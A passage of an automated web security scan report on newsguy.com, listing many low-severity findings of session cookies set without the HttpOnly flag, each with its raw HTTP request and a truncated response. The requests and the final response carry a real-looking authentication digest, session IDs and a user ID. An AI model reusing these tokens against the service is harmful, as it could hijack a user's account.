The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:17 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=074008e54f0654946306e4e65907dd69; path=/
Content-Length: 27709
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Partner Program - Becoming a Newsguy Partner</title>
<
...[SNIP]...

14.33. http://newsguy.com/allinone.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/allinone.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=03a6912f793bb952951adb8e1658ada2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /allinone.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=03a6912f793bb952951adb8e1658ada2; path=/
Content-Length: 17579
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

14.34. http://newsguy.com/birthday.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/birthday.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0ce021a7a64f02ac240a0a8d1e2acf76; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /birthday.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0ce021a7a64f02ac240a0a8d1e2acf76; path=/
Content-Length: 12307
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

14.35. http://newsguy.com/bonusbytes.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/bonusbytes.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=04c5bbd1a9491007cb5f91203243e58b; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bonusbytes.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=04c5bbd1a9491007cb5f91203243e58b; path=/
Content-Length: 15560
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

14.36. http://newsguy.com/cellphone.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/cellphone.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=023e3f49f2d18b856da6d8f94167d019; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cellphone.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:11 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=023e3f49f2d18b856da6d8f94167d019; path=/
Content-Length: 12608
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy - Newsgroups For Cellphones</title>
<meta NAME="description" CONTE
...[SNIP]...

14.37. http://newsguy.com/commd6.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/commd6.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=06c5f7d82a3447eea4d6519eeca1bce1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /commd6.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:53 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=06c5f7d82a3447eea4d6519eeca1bce1; path=/
Content-Length: 17446
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Web Hosting Services</title>
<meta NAME="description"
...[SNIP]...

14.38. http://newsguy.com/contact.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/contact.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0c8270d27d9d3631ff3ceea64605bb86; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:30 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0c8270d27d9d3631ff3ceea64605bb86; path=/
Content-Length: 9186
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - How to Contact Newsguy</title>
<meta NAME="description
...[SNIP]...

14.39. http://newsguy.com/copy.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/copy.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=059470dd7ea704c723c81ddbf036d4ba; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /copy.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:26 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=059470dd7ea704c723c81ddbf036d4ba; path=/
Content-Length: 11876
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Copyright Notice</title>
<meta name="description" cont
...[SNIP]...

14.40. http://newsguy.com/diagnostics.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/diagnostics.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0efe28b79fc3d01048db4a97c38af5ed; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /diagnostics.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0efe28b79fc3d01048db4a97c38af5ed; path=/
Content-Length: 8200
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Testing Your Connection</title>
<meta name="description" content="Test your connection to Newsguy, a provider of Comme
...[SNIP]...

14.41. http://newsguy.com/email.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/email.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0e5fcc0aee2c92abb216c13cc08d7e69; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /email.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e5fcc0aee2c92abb216c13cc08d7e69; path=/
Content-Length: 9327
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Spam Free Email Accounts!</title>
<meta NAME="description" CONTENT="Unlimited Internet Access, Web Hosting, Usenet new
...[SNIP]...

14.42. http://newsguy.com/groups.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/groups.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0e6392c5076efee38380c3142855f369; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e6392c5076efee38380c3142855f369; path=/
Content-Length: 15879
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - NewsguyGroups... - Overview</title>
<meta NAME="descri
...[SNIP]...

14.43. http://newsguy.com/ispcon.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/ispcon.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=09f460e512ac271d0a5c0f9309dbe44c; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ispcon.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=09f460e512ac271d0a5c0f9309dbe44c; path=/
Content-Length: 3910
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - ISPCON Show</title>
<meta name="description" content="Copyright notice for Newsguy News Service, a provider of Commerc
...[SNIP]...

14.44. http://newsguy.com/javascript:LoginNow() previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/javascript:LoginNow()

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=00325277de0c956f453f2d7371dd45bc; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascript:LoginNow() HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:45:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00325277de0c956f453f2d7371dd45bc; path=/
Location: /
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 0

14.45. http://newsguy.com/members.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/members.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=00da9a944623b64631e869c738c369e5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:53 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00da9a944623b64631e869c738c369e5; path=/
Content-Length: 44100
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Member Services and Features</title>
<meta NAME="descr
...[SNIP]...

14.46. http://newsguy.com/msgpanel/message.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/msgpanel/message.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0370095ac18704d8174a3b589b9974d8; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msgpanel/message.asp HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:02:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0370095ac18704d8174a3b589b9974d8; path=/
Content-Length: 45101
Cache-Control: private
Content-Type: text/html

<head>
<style type="text/css">

</styl
...[SNIP]...

14.47. http://newsguy.com/news.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/news.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0e83dea317d99a7de52fe1750cde8b8b; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news.asp HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e83dea317d99a7de52fe1750cde8b8b; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

14.48. http://newsguy.com/news.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/news.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=07d8619e23c66c94db17f947a018eeac; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07d8619e23c66c94db17f947a018eeac; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

14.49. http://newsguy.com/newsguys.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/newsguys.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0540c815ac03e969256e365468d2bfb0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newsguys.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:02 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0540c815ac03e969256e365468d2bfb0; path=/
Content-Length: 23875
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy Referral Program</title>
<meta NAME="descripti
...[SNIP]...

14.50. http://newsguy.com/overview.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/overview.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=07c1fd007b57ee5d13cb4f4071a9b2eb; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /overview.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07c1fd007b57ee5d13cb4f4071a9b2eb; path=/
Content-Length: 33263
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy's Account Options</title>
<meta NAME="descript
...[SNIP]...

14.51. http://newsguy.com/policy.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/policy.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=05a35e6e7093ee3ebb9435e70a8c4d46; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /policy.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=05a35e6e7093ee3ebb9435e70a8c4d46; path=/
Content-Length: 56165
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Service Policy</title>
<meta NAME="description" CONTEN
...[SNIP]...

14.52. http://newsguy.com/services.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/services.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=054baa14c183ba1850baba7e413a8d17; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=054baa14c183ba1850baba7e413a8d17; path=/
Content-Length: 10374
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Services</title>
<meta NAME="description" CONTENT="Acc
...[SNIP]...

14.53. http://newsguy.com/teraton_features.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/teraton_features.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=00cdfc51a8924dd9f4e54a04bd892b1c; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /teraton_features.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:40 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00cdfc51a8924dd9f4e54a04bd892b1c; path=/
Content-Length: 11386
Cache-Control: private
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD><TITLE>NewsGuy - TeraTon. Newsgroup Plugi
...[SNIP]...

14.54. http://newsguy.com/user_info.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://newsguy.com
Path:	/user_info.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id=0d3971146897da5b6739d06ddaf91c57; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:02:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d3971146897da5b6739d06ddaf91c57; path=/
Content-Length: 139
Expires: Mon, 24 Jan 2011 22:02:39 GMT
Cache-Control: no-cache
Content-Type: text/html

DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256
USERID=h02332
DNDDATA=200+6100000+0+0+2011012423+20110223+200+6100000+0+3050000
MAILDATA=

